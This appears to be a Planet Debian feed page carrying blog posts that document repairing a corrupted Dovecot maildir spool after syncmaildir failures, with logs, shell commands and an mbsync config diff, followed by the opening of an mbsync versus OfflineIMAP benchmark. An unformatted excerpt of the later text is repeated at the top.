dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor

This second problem is much harder to fix, because dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size.

I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround

So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool.

And no, rebuilding the index files didn't work. Also tried doveadm force-resync -u anarcat which didn't do anything.

In the end I also had to do this, because the wrong cache values were also stored elsewhere.

service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start

This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).

Incoherence between Maildir and IMAP

Unfortunately, the first mbsync was incomplete as it was missing about 15,000 mails:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 384836 anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 369221

As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption.

It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:

for folder in * .[^.]* ; do printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*' | wc -l ); done

The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files but since they are spread around all folders, which was making it impossible to review where the problem was.

Here is what the diff looks like:

--- Maildir-list 2021-11-17 20:42:36.504246752 -0500 +++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500 @@ -6,16 +6,15 @@ [...] .Archives 1 .Archives.2010 3553 -.Archives.2011 3583 -.Archives.2012 12593 +.Archives.2011 3582 +.Archives.2012 620 .Archives.2013 8576 .Archives.2014 11057 -.Archives.2015 8173 +.Archives.2015 8165 .Archives.2016 54 .band 34 .bitbuck 1 @@ -38,13 +37,12 @@ .couchsurfers 2 -cur 11285 +cur 11280 .current 130 .cv 2 .debbug 262 -.debian 37544 -drafts 1 -.Drafts 4 +.debian 37533 +.Drafts 2 .drone 241 .drupal 188 .drupal-devel 303 [...] Misfiled messages

It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? it does matter, notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync...

After moving those files around, we still have 4,000 message missing:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 381196 anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 385053

The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder

One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:

@@ -30,9 +33,29 @@ Slave :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything -Patterns * +#Patterns * +Patterns * !register !.register # Automatically create missing mailboxes, both locally and on the server #Create Both Create slave # Sync the movement of messages between folders and deletions, add after making sure the sync works #Expunge Both + +IMAPAccount anarcat-register +Host imap.anarc.at +User register +PassCmd "pass imap.anarc.at-register" +SSLType IMAPS +CertificateFile /etc/ssl/certs/ca-certificates.crt + +IMAPStore anarcat-register-remote +Account anarcat-register + +MaildirStore anarcat-register-local +SubFolders Maildir++ +Inbox ~/Maildir-mbsync/.register/ + +Channel anarcat-register +Master :anarcat-register-remote: +Slave :anarcat-register-local: +Create slave "tmp" folders and empty messages

After syncing the "register" messages, I end up with the measly little 160 emails out of sync:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 384900 anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 385059

Argh. After more digging, I have found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, it's even more files, and not the same ones. Possible that those were mails that were left there during a failed delivery of some sort, during a power failure or some sort of crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/...

The first thing to do with those is to cleanup a bunch of empty files (21 on angela):

find .[^.]*/tmp -type f -empty -delete

As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing

find .[^.]*/tmp -type f | while read path; do msgid=$(grep -m 1 -i ^message-id "$path" | sed 's/Message-ID: //i;s/[<>]//g'); if notmuch count --exclude=false "id:$msgid" | grep -q 0; then echo "$path <$msgid> not in notmuch" ; fi; done

... which is good. Or, to put it another way, this is safe:

find .[^.]*/tmp -type f -delete

Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to operate the same twisted logic there.

notmuch to the rescue again

After cleaning that on the client, we get:

anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 384928 anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 384901

Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385034 anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l 384993

That is: even more messages missing (now 37). Sigh.

Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through.

Considering the corruption I found in the mail spool, I wouldn't be the least surprised those messages are just skipped by the IMAP server. Unfortunately, there's nothing on the Dovecot server logs that would explain the discrepancy.

Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:

notmuch search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-msgids notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-mbsync-msgids

And then we can see how many messages notmuch thinks are missing:

$ wc -l *msgids 372723 Maildir-mbsync-msgids 372752 Maildir-msgids

That's 29 messages. Oddly, it doesn't exactly match the find output:

anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l 385204 anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385241

That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely, so the totals actually match.

In the notmuch output, there's a lot of stuff like this:

id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4

Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly the same number of those on both sides, so I'll go ahead and assume those are all accounted for.

What remains is:

anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\-[^-]' | grep -v sha1 | wc -l 2 anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\+[^+]' | grep -v sha1 | wc -l 21 anarcat@angela:~(main)$

ie. 21 missing from mbsync, and, surprisingly, 2 missing from the original mail spool.

Further inspection also showed they were all messages with some sort of "corruption": no body and only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.

Conclusion

As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can (and has) created significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format on its file, and it seems unwise to bypass that.

In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect.

In other words, just talking with an IMAP server opens up a lot more possibilities of hosting than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently and it would have been possible for SMD to permanently corrupt significant part of my mail archives.

In the end, however, the last drop was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it.

In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mail box corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm.

Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

Categories: FLOSS Project Planets

Antoine Beaupré: The last syncmaildir crash

Planet Debian - Sun, 2021-11-21 11:04

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash

On Monday, SMD just started failing with this error:

nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded.
nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir.
nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir.
nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file?
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error
nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.

What is frustrating is that there's actually no network error here. Running the command by hand, I did see a different message, but I have since lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This also happened suddenly, which added to the confusion.

In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes.

Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, I gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption

The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value"

nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578

At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:

while ! mbsync -a; do sleep 1; done

"cached message size larger than expected"

nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=)
nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor

This second problem is much harder to fix, because Dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size.

I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround

So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool.
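
The actual fix script is more extensive; as a minimal sketch of the core idea (with hypothetical filenames and a throwaway demo directory standing in for the real spool — never run something like this against a live spool without a backup), the S= size field in each maildir filename can be checked against the real file size and corrected by renaming:

```shell
# Demo fixture: one message whose S= field (9999) disagrees with its
# real size. In reality this would run over the spool's cur/ directories.
mkdir -p demo/cur
printf 'Subject: test\n\nbody\n' > 'demo/cur/1454623938.M1P1.host,S=9999:2,S'

for f in demo/cur/*,S=*; do
    [ -e "$f" ] || continue
    claimed=$(echo "$f" | sed 's/.*,S=\([0-9]*\).*/\1/')
    actual=$(stat -c %s "$f")
    if [ "$claimed" != "$actual" ]; then
        # rename with the corrected size so Dovecot stops rejecting it
        mv "$f" "$(echo "$f" | sed "s/,S=$claimed/,S=$actual/")"
    fi
done
ls demo/cur   # the file now carries its real size in the S= field
```

The W= (virtual size) field can be handled the same way, although Dovecot heals that one itself, as seen above.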

And no, rebuilding the index files didn't work. I also tried doveadm force-resync -u anarcat, which didn't do anything.

In the end I also had to do this, because the wrong cache values were also stored elsewhere.

service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start

This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).

Incoherence between Maildir and IMAP

Unfortunately, the first mbsync was incomplete as it was missing about 15,000 mails:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
384836
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l
369221

As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption.

It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:

for folder in * .[^.]* ; do printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*' | wc -l ); done

The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That excludes about 200 files which, because they are spread across all folders, made it impossible to see where the problem was.
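
For the record, the two lists being diffed below can be produced by running that same counting loop in each spool and redirecting the output. A sketch, with throwaway directories a/ and b/ standing in for Maildir and Maildir-mbsync (only hidden folders here, so the glob is reduced to .[^.]*):

```shell
# Throwaway stand-ins for the two spools, with a deliberate mismatch
mkdir -p a/.test/cur b/.test/cur
touch a/.test/cur/msg1 a/.test/cur/msg2 b/.test/cur/msg1

# Count files per folder in each spool, one list file per spool
for spool in a b; do
    ( cd "$spool" && for folder in .[^.]*; do
        printf "%s\t%d\n" "$folder" \
            "$(find "$folder" -type f -a \! -name '.*' | wc -l)"
    done ) > "$spool-list"
done
diff -u a-list b-list || true   # shows the .test folder with 2 vs 1 files
```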

Here is what the diff looks like:

--- Maildir-list 2021-11-17 20:42:36.504246752 -0500
+++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500
@@ -6,16 +6,15 @@
[...]
 .Archives 1
 .Archives.2010 3553
-.Archives.2011 3583
-.Archives.2012 12593
+.Archives.2011 3582
+.Archives.2012 620
 .Archives.2013 8576
 .Archives.2014 11057
-.Archives.2015 8173
+.Archives.2015 8165
 .Archives.2016 54
 .band 34
 .bitbuck 1
@@ -38,13 +37,12 @@
 .couchsurfers 2
-cur 11285
+cur 11280
 .current 130
 .cv 2
 .debbug 262
-.debian 37544
-drafts 1
-.Drafts 4
+.debian 37533
+.Drafts 2
 .drone 241
 .drupal 188
 .drupal-devel 303
[...]

Misfiled messages

It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? it does matter, notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync...
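
Moving them back can be scripted. A hedged sketch (a throwaway spool/ directory stands in for the real Maildir; review the output before trusting it) that sweeps stray regular files at a folder's root into its cur/ subdirectory:

```shell
# Fixture: a message sitting at the folder root instead of in cur/
mkdir -p spool/.Archives.2012/cur
touch 'spool/.Archives.2012/1325376000.M1P1.host:2,S'

for folder in spool/.[^.]*; do
    for f in "$folder"/*; do
        # skip the standard maildir subdirectories themselves
        case "$(basename "$f")" in cur|new|tmp) continue ;; esac
        [ -f "$f" ] && mv "$f" "$folder/cur/"
    done
done
```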

After moving those files around, we still have 4,000 messages missing:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l
381196
anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l
385053

The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder

One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:

@@ -30,9 +33,29 @@
 Slave :anarcat-local:
 # Exclude everything under the internal [Gmail] folder, except the interesting folders
 #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
 # Or include everything
-Patterns *
+#Patterns *
+Patterns * !register !.register
 # Automatically create missing mailboxes, both locally and on the server
 #Create Both
 Create slave
 # Sync the movement of messages between folders and deletions, add after making sure the sync works
 #Expunge Both
+
+IMAPAccount anarcat-register
+Host imap.anarc.at
+User register
+PassCmd "pass imap.anarc.at-register"
+SSLType IMAPS
+CertificateFile /etc/ssl/certs/ca-certificates.crt
+
+IMAPStore anarcat-register-remote
+Account anarcat-register
+
+MaildirStore anarcat-register-local
+SubFolders Maildir++
+Inbox ~/Maildir-mbsync/.register/
+
+Channel anarcat-register
+Master :anarcat-register-remote:
+Slave :anarcat-register-local:
+Create slave

"tmp" folders and empty messages

After syncing the "register" messages, I end up with a measly 160 emails out of sync:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l
384900
anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l
385059

Argh. After more digging, I found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, there are even more files, and not the same ones. Possibly those were mails left there during a failed delivery, a power failure, or some other crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/...

The first thing to do with those is to clean up a bunch of empty files (21 on angela):

find .[^.]*/tmp -type f -empty -delete

As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing:

find .[^.]*/tmp -type f | while read path; do msgid=$(grep -m 1 -i ^message-id "$path" | sed 's/Message-ID: //i;s/[<>]//g'); if notmuch count --exclude=false "id:$msgid" | grep -q 0; then echo "$path <$msgid> not in notmuch" ; fi; done

... which is good. Or, to put it another way, this is safe:

find .[^.]*/tmp -type f -delete

Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to apply the same twisted logic there.

notmuch to the rescue again

After cleaning that on the client, we get:

anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l
384928
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l
384901

Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
385034
anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l
384993

That is: even more messages missing (now 37). Sigh.

Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through.

Considering the corruption I found in the mail spool, I wouldn't be the least surprised those messages are just skipped by the IMAP server. Unfortunately, there's nothing on the Dovecot server logs that would explain the discrepancy.

Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:

notmuch search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-msgids
notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-mbsync-msgids

And then we can see how many messages notmuch thinks are missing:

$ wc -l *msgids
  372723 Maildir-mbsync-msgids
  372752 Maildir-msgids

That's 29 messages. Oddly, it doesn't exactly match the find output:

anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l
385204
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
385241

That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely), so the totals actually match.
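
Such strays can be located with a find invocation that lists regular files outside the standard cur/, new/ and tmp/ subdirectories. A sketch against a throwaway tree (on the real spool, the spool directory here would be Maildir):

```shell
# Fixture: one properly filed message and one stray in a draft/ directory
mkdir -p spool/.folder/cur spool/.folder/draft
touch spool/.folder/cur/ok spool/.folder/draft/stray

# list regular files not under cur/, new/ or tmp/, ignoring dotfiles
find spool -type f \
    ! -path '*/cur/*' ! -path '*/new/*' ! -path '*/tmp/*' \
    ! -name '.*'
# prints spool/.folder/draft/stray
```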

In the notmuch output, there's a lot of stuff like this:

id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4

Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly the same number of those on both sides, so I'll go ahead and assume those are all accounted for.
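
That claim is easy to verify by counting the synthesized IDs on each side. A sketch with hypothetical two-line files standing in for the real lists (which come from the notmuch commands above):

```shell
# Stand-in lists; one synthesized sha1 ID and one real Message-ID each
printf 'id:notmuch-sha1-aaaa\nid:real@example.com\n' > Maildir-msgids
printf 'id:notmuch-sha1-bbbb\nid:real@example.com\n' > Maildir-mbsync-msgids

a=$(grep -c 'notmuch-sha1' Maildir-msgids)
b=$(grep -c 'notmuch-sha1' Maildir-mbsync-msgids)
[ "$a" = "$b" ] && echo "sha1 counts match: $a"
# prints sha1 counts match: 1
```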

What remains is:

anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\-[^-]' | grep -v sha1 | wc -l
2
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\+[^+]' | grep -v sha1 | wc -l
21
anarcat@angela:~(main)$

i.e. 21 missing from mbsync and, surprisingly, 2 missing from the original mail spool.

Further inspection also showed they were all messages with some sort of "corruption": no body and only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.

Conclusion

As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can create (and has created) significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format in its files, and it seems unwise to bypass it.

In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect.

In other words, just talking with an IMAP server opens up a lot more hosting possibilities than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently, and SMD could have permanently corrupted a significant part of my mail archives.

In the end, however, the last straw was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it.

In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mailbox corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm.

Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

Categories: FLOSS Project Planets

Antoine Beaupré: mbsync vs OfflineIMAP

Planet Debian - Sun, 2021-11-21 11:04

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync).

But I also evaluated OfflineIMAP, which was resurrected from the Python 2 apocalypse, and which I had used before, for a long time.

Read on for the details.

Benchmark setup

All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye.

The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive.

The server is a custom build with a AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C).

The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:

$ notmuch count --exclude=false
372758
$ du -sh --exclude xapian Maildir
13G Maildir

The baseline we are comparing against is SMD (syncmaildir) which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely.

Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline.

A baseline for a full sync might be also set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/
 12,647,814,731 100%   37.85MB/s    0:05:18 (xfr#394981, to-chk=0/395815)
72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k
8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps

That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/
              0   0%    0.00kB/s    0:00:00 (xfr#0, to-chk=0/395815)
1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k
120inputs+0outputs (3major+12709minor)pagefaults 0swaps

As an extra curiosity, here's the performance with tar, pretty similar to rsync, minus the incremental mode, which I cannot be bothered to figure out right now:

anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/ | pv -s 13G | tar xf -
56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k
0inputs+0outputs (0major+7266minor)pagefaults 0swaps
12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%

It's interesting that rsync manages to almost beat plain tar on this file transfer; I'm actually surprised by how well it performs here, considering there are many little files to transfer.

(But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?)

Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves much faster transfer rate on disks:

anarcat@marcos:~$ tar fc - Maildir | pv -s 13G > Maildir.tar
15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%

That's 131MiB per second, vastly faster than the gigabit link. The client has similar performance:

anarcat@angela:~(main)$ tar fc - Maildir | pv -s 17G > Maildir.tar
16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%

So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. That raises the question of what limits the performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyway.

Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It shows SMD to be faster than OfflineIMAP, but not by as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync

The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirrors, message flags, full folder support, and "trash" functionality.

Complex configuration file

